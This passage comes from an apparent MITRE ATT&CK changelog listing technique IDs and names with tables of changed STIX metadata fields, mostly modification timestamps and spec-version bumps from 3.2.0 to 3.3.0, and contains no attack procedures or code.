Steganography</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:21:09.201000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.714000+00:00</td></tr></tbody></table></details><hr><h4>[T1027.008] Obfuscated Files or Information: Stripped Payloads</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:21:58.918000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr></tbody></table></details><hr><h4>[T1553] Subvert Trust Controls</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:53.101000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr></tbody></table></details><hr><h4>[T1548.003] Abuse Elevation Control Mechanism: Sudo and Sudo Caching</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:52:35.310000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1573.001] Encrypted Channel: Symmetric Cryptography</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:32.429000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1216.002] System Script Proxy Execution: SyncAppvPublishingServer</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:42:56.654000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1218] System Binary Proxy Execution</h4><p><b>Current version</b>: 4.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:37:10.607000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T1497.001] Virtualization/Sandbox Evasion: System Checks</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:51:53.404000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1542.001] Pre-OS Boot: System Firmware</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 18:38:49.546000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.621000+00:00</td></tr></tbody></table></details><hr><h4>[T1082] System Information Discovery</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:38.277000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.625000+00:00</td></tr></tbody></table></details><hr><h4>[T1614.001] System Location Discovery: System Language Discovery</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:20.039000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.713000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1614] System Location Discovery</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:22.536000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.716000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1016] System Network Configuration Discovery</h4><p><b>Current version</b>: 1.7</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:56.618000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1049] System Network Connections Discovery</h4><p><b>Current version</b>: 2.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:01.094000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.652000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1033] System Owner/User Discovery</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:20.366000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.620000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1216] System Script Proxy Execution</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:42:22.297000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr></tbody></table></details><hr><h4>[T1007] System Service Discovery</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:36.812000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.624000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1529] System Shutdown/Reboot</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:40.145000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1124] System Time Discovery</h4><p><b>Current version</b>: 1.5</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:36.399000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.724000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1543.002] Create or Modify System Process: Systemd Service</h4><p><b>Current version</b>: 1.6</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:29.942000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1548.006] Abuse Elevation Control Mechanism: TCC Manipulation</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:52:55.058000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1542.005] Pre-OS Boot: TFTP Boot</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-17 18:38:49.555000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1221] Template Injection</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:44:24.229000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.722000+00:00</td></tr></tbody></table></details><hr><h4>[T1548.005] Abuse Elevation Control Mechanism: Temporary Elevated Cloud Access</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:53:18.398000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.641000+00:00</td></tr></tbody></table></details><hr><h4>[T1055.003] Process Injection: Thread Execution Hijacking</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:30:40.463000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T1055.005] Process Injection: Thread Local Storage</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:30:51.339000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.723000+00:00</td></tr></tbody></table></details><hr><h4>[T1497.003] Virtualization/Sandbox Evasion: Time Based Checks</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:52:39.442000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr></tbody></table></details><hr><h4>[T1070.006] Indicator Removal: Timestomp</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 20:30:57.770000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.630000+00:00</td></tr></tbody></table></details><hr><h4>[T1134.001] Access Token Manipulation: Token Impersonation/Theft</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 19:54:20.663000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.686000+00:00</td></tr></tbody></table></details><hr><h4>[T1588.002] Obtain Capabilities: Tool</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:10.900000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1205] Traffic Signaling</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:44:32.591000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.629000+00:00</td></tr></tbody></table></details><hr><h4>[T1565.002] Data Manipulation: Transmitted Data Manipulation</h4><p><b>Current version</b>: 1.1</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-11-13 19:21:05.133000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.717000+00:00</td></tr></tbody></table></details><hr><h4>[T1484.002] Domain or Tenant Policy Modification: Trust Modification</h4><p><b>Current version</b>: 3.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-16 20:07:52.987000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.623000+00:00</td></tr></tbody></table></details><hr><h4>[T1127] Trusted Developer Utilities Proxy Execution</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:45:17.637000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.726000+00:00</td></tr></tbody></table></details><hr><h4>[T1199] Trusted Relationship</h4><p><b>Current version</b>: 2.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-11-12 15:42:52.705000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.706000+00:00</td></tr></tbody></table></details><hr><h4>[T1059.004] Command and Scripting Interpreter: Unix Shell</h4><p><b>Current version</b>: 1.4</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:12.476000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.707000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1546.004] Event Triggered Execution: Unix Shell Configuration Modification</h4><p><b>Current version</b>: 2.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:49:15.960000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.709000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1535] Unused/Unsupported Cloud Regions</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-15 22:48:40.705000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.635000+00:00</td></tr></tbody></table></details><hr><h4>[T1608.001] Stage Capabilities: Upload Malware</h4><p><b>Current version</b>: 1.3</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-04-01 19:06:26.976000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.628000+00:00</td></tr></tbody></table></details><hr><h4>[T1608.002] Stage Capabilities: Upload Tool</h4><p><b>Current version</b>: 1.2</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th style='border: 1px solid black;border-collapse: collapse;'>New Value</th></tr></thead><tbody><tr><td style='border: 1px solid black;border-collapse: collapse;'>modified</td><td style='border: 1px solid black;border-collapse: collapse;'>2025-10-24 17:48:46.160000+00:00</td><td style='border: 1px solid black;border-collapse: collapse;'>2026-05-12 15:12:00.632000+00:00</td></tr><tr><td style='border: 1px solid black;border-collapse: collapse;'>x_mitre_attack_spec_version</td><td style='border: 1px solid black;border-collapse: collapse;'>3.2.0</td><td style='border: 1px solid black;border-collapse: collapse;'>3.3.0</td></tr></tbody></table></details><hr><h4>[T1550] Use Alternate Authentication Material</h4><p><b>Current version</b>: 2.0</p><details><summary>Details</summary><table style='border: 1px solid black;border-collapse: collapse;'><caption>values_changed</caption><thead><tr><th style='border: 1px solid black;border-collapse: collapse;'>STIX Field</th><th style='border: 1px solid black;border-collapse: collapse;'>Old value</th><th 